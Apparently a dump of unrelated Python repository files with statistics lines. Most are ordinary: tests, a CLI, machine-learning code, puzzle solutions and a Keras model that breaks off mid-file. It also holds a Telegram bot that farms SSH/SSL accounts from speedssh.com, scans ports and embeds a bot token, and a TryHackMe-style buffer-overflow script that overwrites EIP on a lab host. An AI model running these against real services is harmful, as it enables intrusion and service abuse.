alls=f"host : {host_ip} \nusername : speedssh.com-{self.username}\npass : {self.password}\nhttp_custom : {host_ip}:[email protected]{self.username}:{self.password}\n{ex}"
bot.sendMessage(chat, alls)
return alls
elif "has reached Account maximum" in req.text:
self.servers_id.remove(current_id)
self.main(chat)
else:
self.servers_id.remove(current_id)
self.main(chat)
class ssl:
def __init__(self, ids_list):
self.session = requests.Session()
self.username = "".join(random.choices(string.ascii_lowercase + string.digits, k=random.randint(10, 12)))
self.password = "sslDieProfis"
self.servers_id = ids_list
def main(self, chat):
current_id = random.choice(self.servers_id)
url = "https://www.speedssh.com/"
req = self.session.get(url)
cookies = dict(req.cookies)
url = "https://www.speedssh.com/create-account-ssl.php"
headers = {
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
'Host': 'www.speedssh.com',
'Origin': 'https://www.speedssh.com',
'Referer': 'https://www.speedssh.com/create-ssl-account-server/230/server-us-ssl/tls-1',
'Sec-Fetch-Dest': 'empty',
'Sec-Fetch-Mode': 'cors',
'Sec-Fetch-Site': 'same-origin',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.104 Safari/537.36 OPR/74.0.3911.75',
'X-Requested-With': 'XMLHttpRequest',
}
data = f"serverid={current_id}&username={self.username}&password={self.password}"
req = self.session.post(url, headers=headers, data=data)
if "Your Account has been successfully created" in req.text:
host_ip = req.text.split("<br>")[4].split(":")[1].strip()
all_info = f"{host_ip}:[email protected]{self.username}:{self.password}"
ex = req.text.split("<br>")[6]
alls=f"host : {host_ip} \nusername : speedssh.com-{self.username}\npass : {self.password}\nhttp_custom : {host_ip}:[email protected]{self.username}:{self.password}\n{ex}"
bot.sendMessage(chat, alls)
return alls
elif "has reached Account maximum" in req.text:
self.servers_id.remove(current_id)
self.main(chat)
else:
self.servers_id.remove(current_id)
self.main(chat)
serope = ["44", "46", "48", "50"]
sasia = ["36", "38", "40", "42"]
samrica = ["30", "32", "34"]
lerope = ["256", "252", "254", "256", "252"]
lasia = ["244", "238", "240", "242", "246", "248"]
lamrica = ["230", "234", "236"]
def substr(string, start, length = None):
if start < 0:
start = start + len(string)
if not length:
return string[start:]
elif length > 0:
return string[start:start + length]
else:
return string[start:length]
def bot_msg(msg):
chat_id = msg['chat']['id']
command = msg['text']
a=command
if '0' in str(command.find('/ssl')):
one = a.find('-num ')+5
one2 = a.find('-plc') - one - 1
one3 = substr(a, one, one2)
two = a.find('-plc ')+5
two2 = a.find(';') - two
two3 = substr(a, two, two2)
string = '/ssl -num '+one3+' -plc '+two3+';'
if string in a:
if two3 == 'er':
bot.sendMessage(chat_id, 'wait 15s please')
for i in range(int(one3)):
creator = ssl(lerope)
x = creator.main(chat_id)
elif two3 == 'ar':
bot.sendMessage(chat_id, 'wait 15s please')
for i in range(int(one3)):
creator = ssl(lamrica)
x = creator.main(chat_id)
elif two3 == 'as':
bot.sendMessage(chat_id, 'wait 15s please')
for i in range(int(one3)):
creator = ssl(lasia)
x = creator.main(chat_id)
else:
bot.sendMessage(chat_id, 'choose avaible place please')
else:
bot.sendMessage(chat_id, 'wrong syntax')
elif '0' in str(command.find('/ssh')):
one = a.find('-num ')+5
one2 = a.find('-plc') - one - 1
one3 = substr(a, one, one2)
two = a.find('-plc ')+5
two2 = a.find(';') - two
two3 = substr(a, two, two2)
string = '/ssh -num '+one3+' -plc '+two3+';'
if string in a:
if two3 == 'er':
bot.sendMessage(chat_id, 'wait 5s please')
for i in range(int(one3)):
creator = ssh(serope)
x = creator.main(chat_id)
elif two3 == 'ar':
bot.sendMessage(chat_id, 'wait 5s please')
for i in range(int(one3)):
creator = ssh(samrica)
x = creator.main(chat_id)
elif two3 == 'as':
bot.sendMessage(chat_id, 'wait 5s please')
for i in range(int(one3)):
creator = ssh(sasia)
x = creator.main(chat_id)
else:
bot.sendMessage(chat_id, 'choose avaible place please')
else:
bot.sendMessage(chat_id, 'wrong syntax')
elif '0' in str(command.find('/host')):
one = a.find('-t ')+3
one2 = a.find('-h') - one - 1
one3 = substr(a, one, one2)
two = a.find('-h ')+3
two2 = a.find(';') - two
two3 = substr(a, two, two2)
string = '/host -t '+one3+' -h '+two3+';'
if string in a:
if one3 == 'port':
bot.sendMessage(chat_id, 'wait 5s please')
host(two3).port(chat_id)
elif one3 == 'lookup':
bot.sendMessage(chat_id, 'wait 5s please')
host(two3).lookup(chat_id)
elif one3 == 'header':
bot.sendMessage(chat_id, 'wait 5s please')
host(two3).header(chat_id)
elif one3 == 'links':
bot.sendMessage(chat_id, 'wait 5s please')
host(two3).links(chat_id)
else:
bot.sendMessage(chat_id, 'choose avaible type please')
else:
bot.sendMessage(chat_id, 'wrong syntax')
elif '0' in str(command.find('/help')):
helps = 'welcome to Die Profis bot\nlist of classes:\n host\n ssh\n ssl\n trojan (coming soon in new update 24/2/2021)\n proxy (coming soon in new update 24/2/2021)\n create dns server (coming soon in new update 24/2/2021)\nclass host:\n syntax:\n /host -t <select type> -h <host>;\n list of options (types):\n -port -> check open ports in host\n -header -> get headers from host\n -lookup -> get ip from host (dns)\n -links -> show other links for host\n -test -> for test inject (coming soon in new update 24/2/2021)\n test:\n /host -t port -h vodafone.com.eg;\n\nclass ssh:\n syntax:\n /ssh -num <num of account> -plc <place>\n list of places:\n -er\n -as\n -am\n -num -> number of accounts\n test:\n /ssl -num 5 -plc er;\n \nclass ssl:\n syntax:\n /ssl -num <num of account> -plc <place>\n list of places:\n -er\n -as\n -am\n -num -> number of accounts\n test:\n /ssl -num 5 -plc er;\n\n '
bot.sendMessage(chat_id, helps)
elif '0' in str(command.find('/start')):
bot.sendMessage(chat_id, 'welcome mr:.... (what\'s your name )')
bot = telepot.Bot('1871071012:AAF4U-vLrGSitG_qJVBjyc6bPBes-gozMOc')
MessageLoop(bot, bot_msg).run_as_thread()
while 1:
time.sleep(1)
| 44.048583 | 1,093 | 0.536581 | [
"Apache-2.0"
] | XMYSTERlOUSX/ssh-creator-bot | bot.py | 10,880 | Python |
"""Pytest plugin entry point. Used for any fixtures needed."""
import pytest
from .pytest_selenium_enhancer import add_custom_commands
@pytest.fixture(scope='session')
def selenium_patcher():
"""Add custom ."""
add_custom_commands()
| 24.3 | 62 | 0.753086 | [
"MIT"
] | popescunsergiu/pytest-selenium-enhancer | pytest_selenium_enhancer/plugin.py | 243 | Python |
from collections import Counter
def part1(lines):
gamma = ''
epsilon = ''
num_bits = len(lines[0])
for i in range(num_bits):
most_common = Counter(map(lambda x: x[i], lines)).most_common(1)[0][0]
gamma += most_common
epsilon += '0' if most_common == '1' else '1'
return int(gamma, base=2) * int(epsilon, base=2)
def get_value(data, default):
for i in range(len(data[0])):
cntr = Counter(map(lambda x: x[i], data))
most_common = cntr.most_common(1)[0][0] if default == '1' else cntr.most_common()[-1][0][0]
if cntr.most_common(1)[0][1] == cntr.most_common()[-1][1] and len(cntr.most_common()) > 1:
most_common = default
data = list(filter(lambda x: x[i] == most_common, data))
if len(data) < 2:
break
print(data[0])
return int(data[0], base=2)
def part2(lines):
return get_value(lines, '1') * get_value(lines, '0')
def main():
with open('input.txt', 'r') as f:
lines = f.read().splitlines()
print(f'Part 1: {part1(lines)}')
print(f'Part 2: {part2(lines)}')
if __name__ == '__main__':
main()
| 24.553191 | 99 | 0.57539 | [
"MIT"
] | SimeonHristov99/aoc_2021 | day03/binary_diagnostic.py | 1,154 | Python |
from django.shortcuts import render
# Create your views here.
from .models import BallotText, Candidate, District
def index(request):
districts = District.objects.all
context = {'districts': districts}
return render(request, 'vote/index.html', context)
def ballot(request, district_num):
ballot_list = BallotText.objects.all
context = {'ballot_list': ballot_list}
return render(request, 'vote/'+str(district_num)+'/ballot.html', context)
def votetotals(request):
candidates = Candidate.objects.all
return render(request, 'vote/votetotals.html', {"candidates": candidates})
def tally(request):
if request.method == "POST":
list = request.POST
candidates_id = list.items()
all_candidates = Candidate.objects.all()
for id in candidates_id:
print(id[1])
for candidate in all_candidates:
print(candidate.candidate_text)
if candidate.candidate_text == id[1]:
print(candidate.candidate_text + " " + id[1])
candidate.votes += 1
candidate.save()
return render(request, 'vote/votetotals.html')
else:
return render(request, 'vote/votetotals.html')
| 26.208333 | 78 | 0.636725 | [
"MIT"
] | dave-a-fox/VoteNC2020 | nc_vote/vote/views.py | 1,258 | Python |
# Copyright (c) 2019-2020, NVIDIA CORPORATION. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of NVIDIA CORPORATION nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS ``AS IS'' AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY
# OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import sys
sys.path.append("../common")
import os
import unittest
import numpy as np
import infer_util as iu
import test_util as tu
np_dtype_string = np.dtype(object)
TEST_SYSTEM_SHARED_MEMORY = bool(
int(os.environ.get('TEST_SYSTEM_SHARED_MEMORY', 0)))
TEST_CUDA_SHARED_MEMORY = bool(int(os.environ.get('TEST_CUDA_SHARED_MEMORY',
0)))
class InferVariableTest(unittest.TestCase):
def _full_exact(self,
input_dtype,
output0_dtype,
output1_dtype,
input_shape,
output0_shape,
output1_shape,
output0_raw=True,
output1_raw=True,
swap=False):
def _infer_exact_helper(tester,
pf,
tensor_shape,
batch_size,
input_dtype,
output0_dtype,
output1_dtype,
output0_raw=True,
output1_raw=True,
model_version=None,
swap=False,
outputs=("OUTPUT0", "OUTPUT1"),
use_http=True,
use_grpc=True,
skip_request_id_check=False,
use_streaming=True,
correlation_id=0):
for bs in (1, batch_size):
# model that does not support batching
if bs == 1:
iu.infer_exact(
tester,
pf + "_nobatch",
tensor_shape,
bs,
input_dtype,
output0_dtype,
output1_dtype,
output0_raw,
output1_raw,
model_version,
swap,
outputs,
use_http,
use_grpc,
skip_request_id_check,
use_streaming,
correlation_id,
use_system_shared_memory=TEST_SYSTEM_SHARED_MEMORY,
use_cuda_shared_memory=TEST_CUDA_SHARED_MEMORY)
# model that supports batching
iu.infer_exact(
tester,
pf, (bs,) + tensor_shape,
bs,
input_dtype,
output0_dtype,
output1_dtype,
output0_raw,
output1_raw,
model_version,
swap,
outputs,
use_http,
use_grpc,
skip_request_id_check,
use_streaming,
correlation_id,
use_system_shared_memory=TEST_SYSTEM_SHARED_MEMORY,
use_cuda_shared_memory=TEST_CUDA_SHARED_MEMORY)
all_ensemble_prefix = ["simple_", "sequence_", "fan_"]
ensemble_prefix = [""]
for prefix in all_ensemble_prefix:
if tu.validate_for_ensemble_model(prefix, input_dtype,
output0_dtype, output1_dtype,
input_shape, input_shape,
input_shape):
ensemble_prefix.append(prefix)
if tu.validate_for_tf_model(input_dtype, output0_dtype, output1_dtype,
input_shape, output0_shape, output1_shape):
for prefix in ensemble_prefix:
for pf in ["graphdef", "savedmodel"]:
_infer_exact_helper(self,
prefix + pf,
input_shape,
8,
input_dtype,
output0_dtype,
output1_dtype,
output0_raw=output0_raw,
output1_raw=output1_raw,
swap=swap)
if tu.validate_for_trt_model(input_dtype, output0_dtype, output1_dtype,
input_shape, output0_shape, output1_shape):
for prefix in ensemble_prefix:
if input_dtype == np.int8:
_infer_exact_helper(self,
prefix + 'plan',
input_shape + (1, 1),
8,
input_dtype,
output0_dtype,
output1_dtype,
output0_raw=output0_raw,
output1_raw=output1_raw,
swap=swap)
else:
_infer_exact_helper(self,
prefix + 'plan',
input_shape,
8,
input_dtype,
output0_dtype,
output1_dtype,
output0_raw=output0_raw,
output1_raw=output1_raw,
swap=swap)
if tu.validate_for_c2_model(input_dtype, output0_dtype, output1_dtype,
input_shape, output0_shape, output1_shape):
for prefix in ensemble_prefix:
_infer_exact_helper(self,
prefix + 'netdef',
input_shape,
8,
input_dtype,
output0_dtype,
output1_dtype,
output0_raw=output0_raw,
output1_raw=output1_raw,
swap=swap)
# the custom model is src/custom/addsub... it does not swap
# the inputs so always set to False
if tu.validate_for_custom_model(input_dtype, output0_dtype,
output1_dtype, input_shape,
output0_shape, output1_shape):
# No basic ensemble models are created against custom models
_infer_exact_helper(self,
'custom',
input_shape,
8,
input_dtype,
output0_dtype,
output1_dtype,
output0_raw=output0_raw,
output1_raw=output1_raw,
swap=False)
if tu.validate_for_onnx_model(input_dtype, output0_dtype, output1_dtype,
input_shape, output0_shape,
output1_shape):
# No basic ensemble models are created against custom models [TODO]
_infer_exact_helper(self,
'onnx',
input_shape,
8,
input_dtype,
output0_dtype,
output1_dtype,
output0_raw=output0_raw,
output1_raw=output1_raw,
swap=swap)
if tu.validate_for_libtorch_model(input_dtype, output0_dtype,
output1_dtype, input_shape,
output0_shape, output1_shape):
# No basic ensemble models are created against custom models [TODO]
_infer_exact_helper(self,
'libtorch',
input_shape,
8,
input_dtype,
output0_dtype,
output1_dtype,
output0_raw=output0_raw,
output1_raw=output1_raw,
swap=swap)
def test_raw_fff(self):
self._full_exact(np.float32, np.float32, np.float32, (16,), (16,),
(16,))
def test_raw_fii(self):
self._full_exact(np.float32, np.int32, np.int32, (2, 8), (2, 8), (2, 8))
def test_raw_fll(self):
self._full_exact(np.float32, np.int64, np.int64, (8, 4), (8, 4), (8, 4))
def test_raw_fil(self):
self._full_exact(np.float32, np.int32, np.int64, (2, 8, 2), (2, 8, 2),
(2, 8, 2))
def test_raw_ffi(self):
self._full_exact(np.float32, np.float32, np.int32, (16,), (16,), (16,))
def test_raw_iii(self):
self._full_exact(np.int32, np.int32, np.int32, (2, 8), (2, 8), (2, 8))
def test_faw_iif(self):
self._full_exact(np.int32, np.int32, np.float32, (2, 8, 2), (2, 8, 2),
(2, 8, 2))
def test_raw_ooo(self):
self._full_exact(np_dtype_string, np_dtype_string, np_dtype_string,
(16,), (16,), (16,))
def test_raw_oii(self):
self._full_exact(np_dtype_string, np.int32, np.int32, (2, 8), (2, 8),
(2, 8))
def test_raw_ooi(self):
self._full_exact(np_dtype_string, np_dtype_string, np.int32, (8, 4),
(8, 4), (8, 4))
def test_raw_oio(self):
self._full_exact(np_dtype_string, np.int32, np_dtype_string, (2, 8, 2),
(2, 8, 2), (2, 8, 2))
def test_class_fff(self):
self._full_exact(np.float32,
np.float32,
np.float32, (16,), (16,), (16,),
output0_raw=False,
output1_raw=False)
def test_class_fii(self):
self._full_exact(np.float32,
np.int32,
np.int32, (2, 8), (2, 8), (2, 8),
output0_raw=False,
output1_raw=False)
def test_class_fll(self):
self._full_exact(np.float32,
np.int64,
np.int64, (8, 4), (8, 4), (8, 4),
output0_raw=False,
output1_raw=False)
def test_class_fil(self):
self._full_exact(np.float32,
np.int32,
np.int64, (2, 8, 2), (2, 8, 2), (2, 8, 2),
output0_raw=False,
output1_raw=False)
def test_class_ffi(self):
self._full_exact(np.float32,
np.float32,
np.int32, (16,), (16,), (16,),
output0_raw=False,
output1_raw=False)
def test_class_iii(self):
self._full_exact(np.int32,
np.int32,
np.int32, (2, 8), (2, 8), (2, 8),
output0_raw=False,
output1_raw=False)
def test_class_iif(self):
self._full_exact(np.int32,
np.int32,
np.float32, (2, 8, 2), (2, 8, 2), (2, 8, 2),
output0_raw=False,
output1_raw=False)
def test_mix_ffi(self):
self._full_exact(np.float32,
np.float32,
np.int32, (16,), (16,), (16,),
output0_raw=True,
output1_raw=False)
def test_mix_iii(self):
self._full_exact(np.int32,
np.int32,
np.int32, (2, 8), (2, 8), (2, 8),
output0_raw=False,
output1_raw=True)
def test_mix_iif(self):
self._full_exact(np.int32,
np.int32,
np.float32, (2, 8, 2), (2, 8, 2), (2, 8, 2),
output0_raw=True,
output1_raw=False)
if __name__ == '__main__':
unittest.main()
| 42.421053 | 80 | 0.441343 | [
"BSD-3-Clause"
] | DonnieKim411/triton-inference-server | qa/L0_infer_variable/infer_variable_test.py | 14,508 | Python |
# -*- coding: utf-8 -*-
"""API Request cache tests."""
#
# (C) Pywikibot team, 2012-2014
#
# Distributed under the terms of the MIT license.
#
from __future__ import unicode_literals
__version__ = '$Id: 790cd19ca8b22937365bf24b6e40ed90c79ee12b $'
#
from pywikibot.site import BaseSite
import scripts.maintenance.cache as cache
from tests import _cache_dir
from tests.aspects import unittest, TestCase
class RequestCacheTests(TestCase):
"""Validate cache entries."""
net = False
def _check_cache_entry(self, entry):
"""Assert validity of the cache entry."""
self.assertIsInstance(entry.site, BaseSite)
self.assertIsInstance(entry.site._loginstatus, int)
self.assertIsInstance(entry.site._username, list)
if entry.site._loginstatus >= 1:
self.assertIsNotNone(entry.site._username[0])
self.assertIsInstance(entry._params, dict)
self.assertIsNotNone(entry._params)
# TODO: more tests on entry._params, and possibly fixes needed
# to make it closely replicate the original object.
def test_cache(self):
"""Test the apicache by doing _check_cache_entry over each entry."""
cache.process_entries(_cache_dir, self._check_cache_entry)
if __name__ == '__main__':
unittest.main()
| 28.911111 | 76 | 0.707917 | [
"MIT"
] | Annie201/pywikibot-core | tests/cache_tests.py | 1,258 | Python |
import numpy as np
import math
from ml_from_scratch.activation_functions import Sigmoid
from ml_from_scratch.utils import make_diagonal
class LogisticRegression():
""" Logistic Regression classifier.
Parameters:
-----------
n_iters: int
Number of iterations running gradient descent, default is 1000
lr: float
learning rate
gradient_descent: boolean
True or false depending if gradient descent should be used when training. If
false then we use Newton Method.
"""
def __init__(self, n_iters=1000, lr=.1, gradient_descent=True):
self.param = None
self.n_iters = n_iters
self.lr = lr
self.gradient_descent = gradient_descent
self.sigmoid = Sigmoid()
def _initialize_parameters(self, X):
n_features = np.shape(X)[1]
# Initialize parameters between [-1/sqrt(N), 1/sqrt(N)]
limit = 1 / math.sqrt(n_features)
self.param = np.random.uniform(-limit, limit, (n_features,))
def fit(self, X, y):
self._initialize_parameters(X)
# Tune parameters for n iterations
for i in range(self.n_iters):
# Make a new prediction
y_pred = self.sigmoid(X.dot(self.param))
if self.gradient_descent:
# Move against the gradient of the loss function with
# respect to the parameters to minimize the loss
self.param -= self.lr * (y_pred - y).dot(X)
else:
# Make a diagonal matrix of the sigmoid gradient column vector
diag_gradient = make_diagonal(self.sigmoid.gradient(X.dot(self.param)))
# Batch opt:
self.param = np.linalg.pinv(X.T.dot(diag_gradient).dot(X)).\
dot(X.T).dot(diag_gradient.dot(X).dot(self.param) + y - y_pred)
def predict(self, X):
y_pred = np.round(self.sigmoid(X.dot(self.param))).astype(int)
return y_pred
def predict_proba(self, X):
p_pred = self.sigmoid(X.dot(self.param))
return p_pred
| 37.035714 | 87 | 0.619094 | [
"MIT"
] | peimengsui/ml_from_scratch | ml_from_scratch/logistic_regression.py | 2,074 | Python |
#!/usr/bin/env python3
import sys
import psutil
import subprocess
import numpy as np
import matplotlib.pyplot as plt
if (len(sys.argv) < 2):
print("usage: python3 driver.py <runs>")
sys.exit(1)
input_file = 'fib_time'
output_file = "time.png"
runs = int(sys.argv[1])
def outlier_filter(data, threshold=2):
data = np.array(data)
z = np.abs((data - data.mean()) / data.std())
return data[z < threshold]
def data_processing(data, n):
catgories = data[0].shape[0]
samples = data[0].shape[1]
final = np.zeros((catgories, samples))
for c in range(catgories):
for s in range(samples):
final[c][s] = \
outlier_filter([data[i][c][s] for i in range(n)]).mean()
return final
if __name__ == '__main__':
Ys = []
for i in range(runs):
# bind process on cpu0
subprocess.run('sudo taskset 0x1 ./client 2>&1 > /dev/null', shell=True)
output = np.loadtxt(input_file, dtype='float').T
Ys.append(np.delete(output, 0, 0))
X = output[0]
Y = data_processing(Ys, runs)
fig = plt.figure()
ax = fig.add_subplot(1, 1, 1)
ax.set_title('perf', fontsize=16)
ax.set_xlabel(r'$n_{th} fibonacci$', fontsize=16)
ax.set_ylabel('time (ns)', fontsize=16)
ax.plot(X, Y[0], marker='*', markersize=3, label='user') # user
ax.plot(X, Y[1], marker='+', markersize=3, label='kernel') # kernel
ax.plot(X, Y[2], marker='^', markersize=3, label='kernel to user') # kernel to user
ax.legend(loc = 'upper left')
plt.subplots_adjust(bottom=0.15)
plt.savefig(output_file, bbox_inches="tight")
plt.show()
| 27.229508 | 88 | 0.608067 | [
"MIT"
] | rickywu0421/fibdrv | scripts/driver.py | 1,661 | Python |
import socket
import sys
import time
print("[+] Nani???? EIP!!\n")
buff = "A" * 1034
EIP = "B" * 4
Fill = "C" * 62
payload = buff + EIP + Fill
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Connect to the Application
s.connect(('192.168.1.117', 1337))
s.recv(1024) #Recv the banner
#Finally the vulnerable command
s.send('OVERFLOW6 ' + payload + '\r\n')
s.send('EXIT\r\n')
s.close()
print("[+] Execution Finished")
| 15.068966 | 53 | 0.645309 | [
"BSD-3-Clause"
] | SxNade/THM_Buffer-Overflow-Prep | 6/eip.py | 437 | Python |
"""Main entry point for VarFish CLI."""
import argparse
import logging
import os
import sys
import logzero
import toml
from logzero import logger
from varfish_cli import __version__
from .common import run_nocmd, CommonConfig
from .case import setup_argparse as setup_argparse_case
from .case import run as run_case
#: Paths to search the global configuration in.
GLOBAL_CONFIG_PATHS = ("~/.varfishrc.toml",)
def setup_argparse_only(): # pragma: nocover
"""Wrapper for ``setup_argparse()`` that only returns the parser.
Only used in sphinx documentation via ``sphinx-argparse``.
"""
return setup_argparse()[0]
def setup_argparse():
"""Create argument parser."""
# Construct argument parser and set global options.
parser = argparse.ArgumentParser(prog="varfish-cli")
parser.add_argument("--verbose", action="store_true", default=False, help="Increase verbosity.")
parser.add_argument("--version", action="version", version="%%(prog)s %s" % __version__)
group = parser.add_argument_group("Basic Configuration")
group.add_argument(
"--no-verify-ssl",
dest="verify_ssl",
default=True,
action="store_false",
help="Disable HTTPS SSL verification",
)
group.add_argument(
"--config",
default=os.environ.get("VARFISH_CONFIG_PATH", None),
help="Path to configuration file.",
)
group.add_argument(
"--varfish-server-url",
default=os.environ.get("VARFISH_SERVER_URL", None),
help="VarFish server URL key to use, defaults to env VARFISH_SERVER_URL.",
)
group.add_argument(
"--varfish-api-token",
default=os.environ.get("VARFISH_API_TOKEN", None),
help="VarFish API token to use, defaults to env VARFISH_API_TOKEN.",
)
# Add sub parsers for each argument.
subparsers = parser.add_subparsers(dest="cmd")
setup_argparse_case(subparsers.add_parser("case", help="Work with cases."))
return parser, subparsers
def main(argv=None):
"""Main entry point before parsing command line arguments."""
# Setup command line parser.
parser, subparsers = setup_argparse()
# Actually parse command line arguments.
args = parser.parse_args(argv)
# Setup logging incl. verbosity.
if args.verbose: # pragma: no cover
level = logging.DEBUG
else:
# Remove module name and line number if not running in debug mode.s
formatter = logzero.LogFormatter(
fmt="%(color)s[%(levelname)1.1s %(asctime)s]%(end_color)s %(message)s"
)
logzero.formatter(formatter)
level = logging.INFO
logzero.loglevel(level=level)
# Load configuration, if any.
if args.config:
config_paths = (args.config,)
else:
config_paths = GLOBAL_CONFIG_PATHS
for config_path in config_paths:
config_path = os.path.expanduser(os.path.expandvars(config_path))
if os.path.exists(config_path):
with open(config_path, "rt") as tomlf:
toml_config = toml.load(tomlf)
break
else:
toml_config = None
logger.info("Could not find any of the global configuration files %s.", config_paths)
# Merge configuration from command line/environment args and configuration file.
config = CommonConfig.create(args, toml_config)
# Handle the actual command line.
cmds = {None: run_nocmd, "case": run_case}
res = cmds[args.cmd](
config, toml_config, args, parser, subparsers.choices[args.cmd] if args.cmd else None
)
if not res:
logger.info("All done. Have a nice day!")
else: # pragma: nocover
logger.error("Something did not work out correctly.")
return res
if __name__ == "__main__": # pragma: no cover
sys.exit(main(sys.argv))
| 31.619835 | 100 | 0.669106 | [
"MIT"
] | bihealth/varfish-cli | varfish_cli/__main__.py | 3,826 | Python |
import tensorflow.keras.backend as K
import tensorflow as tf
from tensorflow.keras.layers import Input, Conv2D, UpSampling2D, BatchNormalization, ZeroPadding2D, MaxPooling2D, Reshape, \
Concatenate, Lambda
from tensorflow.keras.models import Model
from tensorflow.keras.utils import multi_gpu_model
from tensorflow.keras.utils import plot_model
from custom_layers.unpooling_layer import Unpooling
ATROUS_RATES = [6, 12, 18]
# Conv-MaxPool SPP 24M
def build_encoder_decoder():
# Encoder
input_tensor = Input(shape=(320, 320, 4))
x = ZeroPadding2D((1, 1))(input_tensor)
x = Conv2D(64, (3, 3), activation='relu', name='conv1_1')(x)
x = BatchNormalization()(x)
x = ZeroPadding2D((1, 1))(x)
x = Conv2D(64, (3, 3), activation='relu', name='conv1_2')(x)
x = BatchNormalization()(x)
orig_1 = x
x = MaxPooling2D((2, 2), strides=(2, 2))(x)
x = ZeroPadding2D((1, 1))(x)
x = Conv2D(128, (3, 3), activation='relu', name='conv2_1')(x)
x = ZeroPadding2D((1, 1))(x)
x = Conv2D(128, (3, 3), activation='relu', name='conv2_2')(x)
orig_2 = x
x = MaxPooling2D((2, 2), strides=(2, 2))(x)
x = ZeroPadding2D((1, 1))(x)
x = Conv2D(256, (3, 3), activation='relu', name='conv3_1')(x)
x = ZeroPadding2D((1, 1))(x)
x = Conv2D(256, (3, 3), activation='relu', name='conv3_2')(x)
x = ZeroPadding2D((1, 1))(x)
x = Conv2D(256, (3, 3), activation='relu', name='conv3_3')(x)
orig_3 = x
x = MaxPooling2D((2, 2), strides=(2, 2))(x)
inputs_size = x.get_shape()[1:3]
conv_4_1x1 = Conv2D(512, (1, 1), activation='relu', padding='same', name='conv4_1x1')(x)
conv_4_3x3_1 = Conv2D(512, (3, 3), activation='relu', padding='same', dilation_rate=ATROUS_RATES[0], name='conv4_3x3_1')(x)
conv_4_3x3_2 = Conv2D(512, (3, 3), activation='relu', padding='same', dilation_rate=ATROUS_RATES[1], name='conv4_3x3_2')(x)
conv_4_3x3_3 = Conv2D(512, (3, 3), activation='relu', padding='same', dilation_rate=ATROUS_RATES[2], name='conv4_3x3_3')(x)
# Image average pooling
image_level_features = Lambda(lambda x: tf.reduce_mean(x, [1, 2], keepdims=True), name='global_average_pooling')(x)
image_level_features = Conv2D(512, (1, 1), activation='relu', padding='same', name='image_level_features_conv_1x1')(image_level_features)
image_level_features = Lambda(lambda x: tf.image.resize(x, inputs_size), name='upsample_1')(image_level_features)
# Concat
x = Concatenate(axis=3)([conv_4_1x1, conv_4_3x3_1, conv_4_3x3_2, conv_4_3x3_3, image_level_features])
x = Conv2D(512, (1,1), activation='relu', padding='same', name='conv_1x1_1_concat')(x)
x = Conv2D(512, (1,1), activation='relu', padding='same', name='conv_1x1_2_concat')(x)
orig_4 = x
x = MaxPooling2D((2, 2), strides=(2, 2))(x)
x = ZeroPadding2D((1, 1))(x)
x = Conv2D(512, (3, 3), activation='relu', name='conv5_1')(x)
x = ZeroPadding2D((1, 1))(x)
x = Conv2D(512, (3, 3), activation='relu', name='conv5_2')(x)
x = ZeroPadding2D((1, 1))(x)
x = Conv2D(512, (3, 3), activation='relu', name='conv5_3')(x)
orig_5 = x
x = MaxPooling2D((2, 2), strides=(2, 2))(x)
# Decoder
#
x = UpSampling2D(size=(2, 2))(x)
the_shape = K.int_shape(orig_5)
shape = (1, the_shape[1], the_shape[2], the_shape[3])
origReshaped = Reshape(shape)(orig_5)
xReshaped = Reshape(shape)(x)
together = Concatenate(axis=1)([origReshaped, xReshaped])
x = Unpooling()(together)
x = Conv2D(512, (3, 3), activation='relu', padding='same', name='deconv5_1',
kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = Conv2D(512, (3, 3), activation='relu', padding='same', name='deconv5_2',
kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = Conv2D(512, (3, 3), activation='relu', padding='same', name='deconv5_3',
kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = UpSampling2D(size=(2, 2))(x)
the_shape = K.int_shape(orig_4)
shape = (1, the_shape[1], the_shape[2], the_shape[3])
origReshaped = Reshape(shape)(orig_4)
xReshaped = Reshape(shape)(x)
together = Concatenate(axis=1)([origReshaped, xReshaped])
x = Unpooling()(together)
x = Conv2D(256, (3, 3), activation='relu', padding='same', name='deconv4_1',
kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = Conv2D(256, (3, 3), activation='relu', padding='same', name='deconv4_2',
kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = Conv2D(256, (3, 3), activation='relu', padding='same', name='deconv4_3',
kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = UpSampling2D(size=(2, 2))(x)
the_shape = K.int_shape(orig_3)
shape = (1, the_shape[1], the_shape[2], the_shape[3])
origReshaped = Reshape(shape)(orig_3)
xReshaped = Reshape(shape)(x)
together = Concatenate(axis=1)([origReshaped, xReshaped])
x = Unpooling()(together)
